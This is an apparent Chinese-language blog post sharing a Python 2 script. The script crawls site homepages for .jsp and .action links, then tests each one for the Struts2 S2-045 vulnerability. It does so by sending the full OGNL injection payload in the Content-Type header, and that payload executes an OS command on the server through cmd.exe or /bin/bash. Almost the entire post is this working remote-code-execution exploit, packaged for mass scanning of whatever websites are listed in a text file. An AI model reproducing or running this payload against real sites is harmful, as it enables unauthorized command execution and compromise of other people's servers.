【Python】批量爬取网站URL测试Struts2-045漏洞

1、概述都懒得写了。。。。

就是批量测试用的，什么工具里扣出来的POC，然后根据自己的理解写了个爬网站首页URL的代码。。。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import random
import httplib
import re
import os
import sys

#########################
##  作者：zzzzzhhhhhhh
##  Code功能
##    1、批量获取指定网站的URL
##    2、批量验证Struts2-045漏洞
##    BUG：121个左右根据网络状况会报错，清除已测试过的网址再测试就没啥问题。懵逼
###########################


# 出现ChunkedEncodingError问题，更改为HTTP 1.0
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'

# 存放内容
http_URL = []
http_website  = []

# 增加HTTP头部
def add_http(url):
    if "http://" not in url:
        url = 'http://' + url
    return url

# 爬行首页URL
def curl_Site_URL(url):
    url = add_http(url)
    website = url  # 存储一下域名，路径碰路径
    # 获取网页内容
    try:
        r = requests.get(url)
    except requests.RequestException as e:
        print "error website:"+url
        return False
    data = r.text
    # 利用正则查找所有连接
    link_list = re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')", data)
    for url in link_list:
        filename = os.path.basename(url)  # 取出文件名
        (shotname, extension) = os.path.splitext(filename)  # 取出文件后缀
        if ((extension == ".jsp") or (extension == ".action")):  # 指定后缀检测
            if 'http://' not in url:  # 检测是否有HTTP://
                url = website + url
                http_URL.append(url)    # 读取到列表里或者写入文件中
            else:
                http_URL.append(url)

## 2、验证Stuts2漏洞
def poc(url):
    url = add_http(url)
    try:
        a = random.randint(10000000, 20000000)
        b = random.randint(10000000, 20000000)
        c = a + b
        win = 'set /a ' + str(a) + ' + ' + str(b)
        linux = 'expr ' + str(a) + ' + ' + str(b)
        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        r = requests.post(url, headers=header, timeout=5)
        if str(c) in r.text:
            return '[S2-045 vul]'+url
        else:
            return False
    except Exception:
        return False


# 读取文件函数
def read_file(file_path):
    # 判断文件路径是否存在，如果不存在直接退出，否则读取文件内容
    if not os.path.exists(file_path):
        print 'Please confirm correct filepath !'
        sys.exit(0)
    else:
        with open(file_path, 'r') as source:
            for line in source:
                http_website.append(line.rstrip('\r\n').rstrip('\n'))
    # 批量读取
    sum = 0
    for website in http_website:
        print website
        curl_Site_URL(website)


    # 批量验证
    for d in http_URL:
        result = poc(d)
        if result != False:
            print result


if __name__ == '__main__':
    file_str=raw_input('Input file IP.txt filepath eg:D:\\\\test.txt \n')
    read_file(file_str)
    ## C:\\Users\\AT\\Desktop\\domain.txt

代码特效

txt里保存网站地址就可以了，爬虫还需要后续学习优化、添加功能。。。